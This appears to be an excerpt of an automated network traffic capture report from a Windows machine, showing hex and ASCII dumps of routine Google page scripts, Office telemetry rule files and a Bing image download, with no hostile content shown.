2024-12-07 09:51:23 UTC	1390	IN	Data Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
2024-12-07 09:51:23 UTC	1390	IN	Data Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20 Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
2024-12-07 09:51:23 UTC	1390	IN	Data Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
2024-12-07 09:51:23 UTC	1390	IN	Data Raw: 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 32 38 33 2c 33 37 30 30 39 34 39 2c 33 37 30 31 30 37 31 2c 33 37 30 31 33 38 34 2c 31 30 32 31 31 38 39 33 39 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 Data Ascii: enu-content","metadata":{"bar_height":60,"experiment_id":[3700283,3700949,3701071,3701384,102118939],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_\|\|{};(functi
2024-12-07 09:51:23 UTC	1390	IN	Data Raw: 30 29 7b 63 6f 6e 73 74 20 63 5c 75 30 30 33 64 41 72 72 61 79 28 62 29 3b 66 6f 72 28 6c 65 74 20 64 5c 75 30 30 33 64 30 3b 64 5c 75 30 30 33 63 62 3b 64 2b 2b 29 63 5b 64 5d 5c 75 30 30 33 64 61 5b 64 5d 3b 72 65 74 75 72 6e 20 63 7d 72 65 74 75 72 6e 5b 5d 7d 3b 49 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 48 64 28 62 5c 75 30 30 33 64 5c 75 30 30 33 65 62 2e 73 75 62 73 74 72 28 30 2c 61 2e 6c 65 6e 67 74 68 2b 31 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 61 2b 5c 22 3a 5c 22 29 7d 3b 5f 2e 4a 64 5c 75 30 30 33 64 67 6c 6f 62 61 6c 54 68 69 73 2e 74 72 75 73 74 65 64 54 79 70 65 73 3b 5f 2e 4b 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e Data Ascii: 0){const c\u003dArray(b);for(let d\u003d0;d\u003cb;d++)c[d]\u003da[d];return c}return[]};Id\u003dfunction(a){return new _.Hd(b\u003d\u003eb.substr(0,a.length+1).toLowerCase()\u003d\u003d\u003da+\":\")};_.Jd\u003dglobalThis.trustedTypes;_.Kd\u003dclass{con
2024-12-07 09:51:23 UTC	781	IN	Data Raw: 2e 56 64 29 72 65 74 75 72 6e 20 61 2e 69 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 7d 3b 5f 2e 5a 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 59 64 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 24 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 4b 64 29 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 4b 64 29 61 5c 75 30 30 33 64 61 2e 69 3b 65 6c 73 65 20 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 65 6c 73 65 20 61 5c 75 30 30 33 64 5f 2e 5a 64 28 61 29 3b 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 61 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 29 7b 6c 65 74 20 63 2c Data Ascii: .Vd)return a.i;throw Error(\"F\");};_.Zd\u003dfunction(a){if(Yd.test(a))return a};_.$d\u003dfunction(a){if(a instanceof _.Kd)if(a instanceof _.Kd)a\u003da.i;else throw Error(\"F\");else a\u003d_.Zd(a);return a};_.ae\u003dfunction(a,b\u003ddocument){let c,
2024-12-07 09:51:23 UTC	394	IN	Data Raw: 31 38 33 0d 0a 5c 75 30 30 33 64 30 29 7b 72 65 74 75 72 6e 20 5f 2e 76 62 28 5f 2e 64 65 28 61 2c 62 29 2c 63 29 7d 3b 5f 2e 65 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 5c 75 30 30 33 64 30 29 7b 72 65 74 75 72 6e 20 5f 2e 76 62 28 5f 2e 53 28 61 2c 62 29 2c 63 29 7d 3b 5f 2e 67 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 61 2e 6c 61 73 74 49 6e 64 65 78 4f 66 28 62 2c 30 29 5c 75 30 30 33 64 5c 75 30 30 33 64 30 7d 3b 52 64 5c 75 30 30 33 64 5f 2e 4a 64 3b 5f 2e 56 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69 5c 75 30 30 33 64 61 7d 74 6f 53 74 72 69 6e 67 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 2b 5c 22 5c 22 7d 7d 3b 59 64 5c Data Ascii: 183\u003d0){return _.vb(_.de(a,b),c)};_.ee\u003dfunction(a,b,c\u003d0){return _.vb(_.S(a,b),c)};_.ge\u003dfunction(a,b){return a.lastIndexOf(b,0)\u003d\u003d0};Rd\u003d_.Jd;_.Vd\u003dclass{constructor(a){this.i\u003da}toString(){return this.i+\"\"}};Yd\
2024-12-07 09:51:23 UTC	1390	IN	Data Raw: 38 30 30 30 0d 0a 65 77 20 68 65 29 7d 3b 5f 2e 6b 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 62 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 72 69 6e 67 5c 22 3f 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 62 29 3a 62 7d 3b 5f 2e 55 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 5c 75 30 30 33 64 62 7c 7c 64 6f 63 75 6d 65 6e 74 3b 63 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 3f 61 5c 75 30 30 33 64 63 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 61 29 5b 30 5d 3a 28 63 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 2c 61 3f 61 5c 75 30 30 33 64 28 62 7c 7c 63 29 2e 71 75 65 72 79 53 65 6c Data Ascii: 8000ew he)};_.ke\u003dfunction(a,b){return typeof b\u003d\u003d\u003d\"string\"?a.getElementById(b):b};_.U\u003dfunction(a,b){var c\u003db\|\|document;c.getElementsByClassName?a\u003dc.getElementsByClassName(a)[0]:(c\u003ddocument,a?a\u003d(b\|\|c).querySel

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.6	49730	142.250.181.68	443	3200	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:22 UTC	353	OUT	GET /async/newtab_promos HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-07 09:51:23 UTC	933	IN	HTTP/1.1 200 OK Version: 702228742 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Sat, 07 Dec 2024 09:51:22 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-07 09:51:23 UTC	35	IN	Data Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a Data Ascii: 1d)]}'{"update":{"promos":{}}}
2024-12-07 09:51:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
17	192.168.2.6	49736	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:23 UTC	192	OUT	GET /rules/rule120609v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:23 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:23 GMT Content-Type: text/xml Content-Length: 408 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB56D3AFB" x-ms-request-id: b9950e54-401e-0015-4806-480e8d000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095123Z-r1cf579d778bb9vvhC1EWRs95400000001hg000000003006 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:23 UTC	408	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
18	192.168.2.6	49735	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:23 UTC	192	OUT	GET /rules/rule120600v4s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:23 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:23 GMT Content-Type: text/xml Content-Length: 2980 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT ETag: "0x8DC582BA80D96A1" x-ms-request-id: 2b116ba0-201e-0051-0503-487340000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095123Z-r1cf579d778qlpkrhC1EWRpfc800000002tg000000000aww x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:23 UTC	2980	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"

Session ID	Source IP	Source Port	Destination IP	Destination Port
19	192.168.2.6	49733	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:23 UTC	192	OUT	GET /rules/rule224902v2s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:23 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:23 GMT Content-Type: text/xml Content-Length: 450 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT ETag: "0x8DC582BD4C869AE" x-ms-request-id: c11b12be-901e-0048-4704-48b800000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095123Z-r1cf579d7784wpmvhC1EWRk4cn00000001c0000000003e5w x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:23 UTC	450	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN

Session ID	Source IP	Source Port	Destination IP	Destination Port
20	192.168.2.6	49737	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:23 UTC	192	OUT	GET /rules/rule120608v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:23 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:23 GMT Content-Type: text/xml Content-Length: 2160 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA3B95D81" x-ms-request-id: a36b2733-e01e-0051-6f03-4884b2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095123Z-r1cf579d778t6txphC1EWRsd4400000002kg000000000nhy x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:23 UTC	2160	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
21	192.168.2.6	49734	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:23 UTC	193	OUT	GET /rules/rule120402v21s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:23 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:23 GMT Content-Type: text/xml Content-Length: 3788 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT ETag: "0x8DC582BAC2126A6" x-ms-request-id: 3fcd35f4-e01e-0052-4b02-48d9df000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095123Z-r1cf579d7788pwqzhC1EWRrpd800000002700000000036hc x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:23 UTC	3788	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.6	49738	150.171.27.10	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:23 UTC	375	OUT	GET /th?id=OADD2.10239340418551_1MWHJRW59UCHVWKN4&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: tse1.mm.bing.net Connection: Keep-Alive
2024-12-07 09:51:23 UTC	854	IN	HTTP/1.1 200 OK Cache-Control: public, max-age=2592000 Content-Length: 534196 Content-Type: image/jpeg X-Cache: TCP_HIT Access-Control-Allow-Origin: * Access-Control-Allow-Headers: * Access-Control-Allow-Methods: GET, POST, OPTIONS Timing-Allow-Origin: * Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]} NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0} Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: 87502272F9B34BB5B6F3C25A4D339C24 Ref B: EWR30EDGE0414 Ref C: 2024-12-07T09:51:23Z Date: Sat, 07 Dec 2024 09:51:22 GMT Connection: close
2024-12-07 09:51:23 UTC	15530	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff e1 00 da 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 00 00 00 00 60 00 00 00 01 00 00 00 60 00 00 00 01 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 34 2e 31 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 33 3a 30 32 3a 31 31 20 30 31 3a 30 32 3a 33 36 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 03 00 00 00 01 07 80 00 00 a0 03 00 03 00 00 00 01 04 